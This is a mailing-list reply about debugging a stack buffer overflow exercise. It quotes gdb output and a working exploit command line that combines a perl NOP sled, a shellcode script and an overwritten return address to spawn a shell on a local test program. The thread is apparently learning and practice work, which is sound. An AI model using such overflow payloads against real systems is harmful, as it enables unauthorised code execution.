Re: Buffer Overflow problem

["John Vill" <kalookalaa () hotmail com>]

Hello,

Thanks for the reply, Krzysztof. My return address isnt incorrectly aligned 
as it is being put into the EIP the right way as I see it with the info 
registers in gdb. If I add or subtract a NOP or two "00" gets added to the 
beginning or end of the address. For example 0xfff94b00 or 0x00bffff9 where 
my address is 0xbffff94b. Or maybe it is the problem and Im just not 
understanding correctly?

I used this exact method for overflowing a larger buffer (500 or so) and it 
works fine. I do not know why im getting Illegal Instruction. The address Im 
using is from:
      unsigned long sp(){ __asm__("movl %esp, %eax"); }
I run that to get the addr and use that address. I havent tried other 
methods like the got, libc, or even dtors yet. I just have no clue why I'm 
getting "Illegal Instruction" when the EIP is being overwritten with the 
right address. I made sure to turn off all the stack protections and 
everything... Can anyone tell me what "Illegal Instruction" is exactly? This 
is frustrating =P



> Program received signal SIGSEGV, Segmentation fault.
> 0x00bffff4 in ?? ()
>
> So I'm just one byte off from the correct location. Examining the stack 
> proves
> that this is true:
>
> (gdb) x/4x $esp - 8
> 0xbffff5a8:     0xa068732f      0x00bffff4      0x00000002      0xbffff5f4
> (gdb)
>
> The value 0xa06873f2 just before the return addr holds the missing part of 
> my
> buffer's address. So all you have to do is move the entire address by one
> byte. So...
>
> Starting program: /home/kg/prog/sec/buf `perl -e 'print
> "\x90"x223'``./mkshell.pl``perl -e 'print "\xa6\xf4\xff\xbf"'`
>
> sh-2.05b$
>
> .. it works.

_________________________________________________________________
Watch LIVE baseball games on your computer with MLB.TV, included with MSN 
Premium! 
http://join.msn.com/?page=features/mlb&pgmarket=en-us/go/onm00200439ave/direct/01/


---------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off 
any course! All of our class sizes are guaranteed to be 10 students or less 
to facilitate one-on-one interaction with one of our expert instructors. 
Attend a course taught by an expert instructor with years of in-the-field 
pen testing experience in our state of the art hacking lab. Master the skills 
of an Ethical Hacker to better assess the security of your organization. 
Visit us at: 
http://www.infosecinstitute.com/courses/ethical_hacking_training.html
----------------------------------------------------------------------------